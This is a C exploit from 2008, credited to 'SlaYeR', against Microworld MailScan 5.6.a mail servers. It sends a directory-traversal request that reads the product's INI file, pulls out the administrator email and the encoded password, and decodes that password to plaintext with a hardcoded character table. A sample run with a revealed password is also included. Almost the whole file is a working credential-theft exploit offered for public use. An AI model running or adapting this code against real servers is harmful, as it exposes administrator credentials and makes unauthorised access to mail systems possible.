/* ----------------------------------------------------------------------------------------------
_____ ____ / ___/___ _____/ __ \___ _ __ \__ \/ _ \/ ___/ / / / _ \ | / / ___/ / __/ /__/ /_/ / __/ |/ / /____/\___/\___/_____/\___/|___/ [2008] SecurityDevelopment.net
Author: SlaYeR Date: 25. Aug. 2008 Email: slayer@securitydevelopment.net Website: www.securitydevelopment.net IRC: dragon.overfl0w.org #securitydevelopment.net
Exploit based on the advisory from Oliver Karow @ http://securityvulns.com/Udocument375.html
- MailScan for Mail Servers
* Version: 5.6.a with espatch1 * Win32 Platform
Other Mailscan Products, Versions, also, if available for other platforms, were not tested.
I used the Directory Traversal methode to access the ini file of mailscan application to gain some importend data. After some research i found out that the password algorithm was extreamly weak. So i decided to code a exploit for it.
15. Aug. 2008 - Advisory release 20. Aug. 2008 - SlaYeR founds out about the advisory 21. Aug. 2008 - Found out about the ini file 22. Aug. 2008 - Found out about the weak algorithm and coded a sploit for it. 25. Aug. 2008 - Private version done. 04. Sep. 2008 - Hotfix released by Microworld. 09. Sep. 2008 - Public release
Some special greets to: Dams - He helped me with some stupid errors inside the decode_hash function JGS - He helped me with the spliting hash part Mikke8 - He didn't helped me but i like hem;)
Team Ph0enix - Cuz they Own
_____ ____ / ___/___ _____/ __ \___ _ __ \__ \/ _ \/ ___/ / / / _ \ | / / ___/ / __/ /__/ /_/ / __/ |/ / /____/\___/\___/_____/\___/|___/ [2008] SecurityDevelopment.net
- Microworld Mailscan 5.6.a password reveal exploit - Coded by: SlaYeR
[!] Targeting [!] Building magic string! [!] Connected to host! [!] Building request! [!] Opening target! [+] SERVER: MailScan 5.6a [+] ADMIN: insecure-mailscan@securitydevelopment.net [+] HASH: GJBIAHALBCHIBJGJGGAEBMAFBIGGAGGKAIBJHLBMAEBJDHAPBH [+] PASS: "sl@y3r"-owns-m!cr0word|\ [+] Done!
#include <stdio.h> #include <windows.h> #include <wininet.h>
#pragma comment(lib, "wininet") #pragma comment(lib,"ws2_32")
char *SECDEV_ASCII= " _____ ____ \n" " / ___/___ _____/ __ \\___ _ __\n" " \\__ \\/ _ \\/ ___/ / / / _ \\ | / /\n" " ___/ / __/ /__/ /_/ / __/ |/ / \n" " /____/\\___/\\___/_____/\\___/|___/ \n" " [2008] SecurityDevelopment.net\r\n" "\r\n" " - Microworld Mailscan 5.6.a password reveal exploit -\r\n" " Coded by: SlaYeR\r\n" " \r\n\r\n";
int decode_hash(char * string); int Count; int exploit(char *url,char *port);
int main(int argc, char *argv[]) { char *url = argv[1]; char *port = argv[2]; printf(SECDEV_ASCII);
if( argc <= 2 ) { printf(" Usage: %s <IP> <PORT>\n",argv[0]); return 0; } else { exploit(url,port); } return 0; }
int exploit(char *url,char *port) { printf("[!] Targeting %s:%s\n",url,port);
HINTERNET httpopen, openurl; char buffer2[1024]; DWORD read; char *check; char *string1 = "http://"; char *string2 = "/../../../../PROGRA~1/MailScan/MAILSCAN.INI"; char bigbuffer[1025]; char buffer3[1025]; char buffer4[1025]; char buffer5[1025]; char buffer6[1025];
if(httpopen = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0)) { printf("[!] Building request!\n"); memset(bigbuffer,0,1025); memcpy(bigbuffer,string1,strlen(string1)); memcpy(bigbuffer+strlen(bigbuffer),url,strlen(url)); memcpy(bigbuffer+strlen(bigbuffer),":",strlen(":")); memcpy(bigbuffer+strlen(bigbuffer),port,strlen(port)); memcpy(bigbuffer+strlen(bigbuffer),string2,strlen(string2)); } else { printf("[-] Error building request!\n"); InternetCloseHandle(httpopen); CloseHandle(buffer2); return 0; }
printf("[!] Trying to connect @ %s:%s\n",url,port); if(openurl = InternetOpenUrl(httpopen, bigbuffer, NULL, NULL, INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL)) { printf("[!] Connected to host!\n"); } else { printf("[-] Error while connecting! \n"); InternetCloseHandle(httpopen); InternetCloseHandle(openurl); CloseHandle(buffer2); return 0; }
if(InternetReadFile(openurl, buffer2, sizeof(buffer2), &read)) {
if(check = strstr(buffer2, "[General]")) {
check = strstr(buffer2, "UserPassword="); sscanf(check, "UserPassword=%s ", buffer3);
check = strstr(buffer2, "AdminEmailId="); sscanf(check, "AdminEmailId=%s ", buffer4);
check = strstr(buffer2, "ProductName="); sscanf(check, "ProductName=%s ", buffer5);
check = strstr(buffer2, "Version="); sscanf(check, "Version=%s ", buffer6); }
if( check==NULL ) { printf("[-] Server not vuln :(\n");
} else { printf("[+] SERVER: %s %s\n",buffer5,buffer6); printf("[+] ADMIN: %s\n",buffer4); printf("[+] HASH: %s\n",buffer3); printf("[+] PASS: ");
char bufferfiller[sizeof(buffer3)]; char temp[1025];
for (int i=0;i < strlen(buffer3); i++) { Count++;
sprintf(temp,"%c",buffer3[i]); memcpy(bufferfiller+strlen(bufferfiller),temp,strlen(temp));
if(Count == 2) { char buf[255]; memset(buf,0,sizeof(255)); sprintf(buf,"%s",bufferfiller);
decode_hash(buf); memset(bufferfiller,0,1025); Count = 0; } } printf("\n[+] Done!\n"); } } else { printf("[-] Server not vuln :(\n"); }
InternetCloseHandle(httpopen); InternetCloseHandle(openurl); CloseHandle(buffer2);
return 0; }
int decode_hash(char * string) {
// Yes it token me allot of work to wrote this down... (only default charset) // if you want more just do it by yourself
if( strcmp( string, "DA" ) == 0 ){printf("{");} if( strcmp( string, "DG" ) == 0 ){printf("}");} if( strcmp( string, "BH" ) == 0 ){printf("|");} if( strcmp( string, "HB" ) == 0 ){printf(":");} if( strcmp( string, "GJ" ) == 0 ){printf("\"");} if( strcmp( string, "HH" ) == 0 ){printf("<");} if( strcmp( string, "HF" ) == 0 ){printf(">");} if( strcmp( string, "HE" ) == 0 ){printf("?");} if( strcmp( string, "BA" ) == 0 ){printf("[");} if( strcmp( string, "BG" ) == 0 ){printf("]");} if( strcmp( string, "BH" ) == 0 ){printf("\\");} if( strcmp( string, "HA" ) == 0 ){printf(";");} if( strcmp( string, "GM" ) == 0 ){printf("'");} if( strcmp( string, "GH" ) == 0 ){printf(",");} if( strcmp( string, "GF" ) == 0 ){printf(".");} if( strcmp( string, "GE" ) == 0 ){printf("/");} if( strcmp( string, "DF" ) == 0 ){printf("~");} if( strcmp( string, "GK" ) == 0 ){printf("!");} if( strcmp( string, "AL" ) == 0 ){printf("@");} if( strcmp( string, "GI" ) == 0 ){printf("#");} if( strcmp( string, "GP" ) == 0 ){printf("$");} if( strcmp( string, "GO" ) == 0 ){printf("%");} if( strcmp( string, "BF" ) == 0 ){printf("^");} if( strcmp( string, "GN" ) == 0 ){printf("&");} if( strcmp( string, "GB" ) == 0 ){printf("*");} if( strcmp( string, "GD" ) == 0 ){printf("(");} if( strcmp( string, "BE" ) == 0 ){printf("_");} if( strcmp( string, "GA" ) == 0 ){printf("+");} if( strcmp( string, "GG" ) == 0 ){printf("-");} if( strcmp( string, "HG" ) == 0 ){printf("=");} if( strcmp( string, "AK" ) == 0 ){printf("a");} if( strcmp( string, "AJ" ) == 0 ){printf("b");} if( strcmp( string, "AI" ) == 0 ){printf("c");} if( strcmp( string, "AP" ) == 0 ){printf("d");} if( strcmp( string, "AO" ) == 0 ){printf("e");} if( strcmp( string, "AN" ) == 0 ){printf("f");} if( strcmp( string, "AM" ) == 0 ){printf("g");} if( strcmp( string, "AD" ) == 0 ){printf("h");} if( strcmp( string, "AC" ) == 0 ){printf("i");} if( strcmp( string, "AB" ) == 0 ){printf("j");} if( strcmp( string, "AA" ) == 0 ){printf("k");} if( strcmp( string, "AH" ) == 0 ){printf("l");} if( strcmp( string, "AG" ) == 0 ){printf("m");} if( strcmp( string, "AF" ) == 0 ){printf("n");} if( strcmp( string, "AE" ) == 0 ){printf("o");} if( strcmp( string, "BL" ) == 0 ){printf("p");} if( strcmp( string, "BK" ) == 0 ){printf("q");} if( strcmp( string, "BJ" ) == 0 ){printf("r");} if( strcmp( string, "BI" ) == 0 ){printf("s");} if( strcmp( string, "BP" ) == 0 ){printf("t");} if( strcmp( string, "BO" ) == 0 ){printf("u");} if( strcmp( string, "BN" ) == 0 ){printf("v");} if( strcmp( string, "BM" ) == 0 ){printf("w");} if( strcmp( string, "BD" ) == 0 ){printf("x");} if( strcmp( string, "BC" ) == 0 ){printf("y");} if( strcmp( string, "BB" ) == 0 ){printf("z");} if( strcmp( string, "HK" ) == 0 ){printf("1");} if( strcmp( string, "HJ" ) == 0 ){printf("2");} if( strcmp( string, "HI" ) == 0 ){printf("3");} if( strcmp( string, "HP" ) == 0 ){printf("4");} if( strcmp( string, "HO" ) == 0 ){printf("5");} if( strcmp( string, "HN" ) == 0 ){printf("6");} if( strcmp( string, "HM" ) == 0 ){printf("7");} if( strcmp( string, "HD" ) == 0 ){printf("8");} if( strcmp( string, "HC" ) == 0 ){printf("9");} if( strcmp( string, "HL" ) == 0 ){printf("0");} if( strcmp( string, "GC" ) == 0 ){printf(")");} if( strcmp( string, "GL" ) == 0 ){printf(" ");}
return 0; }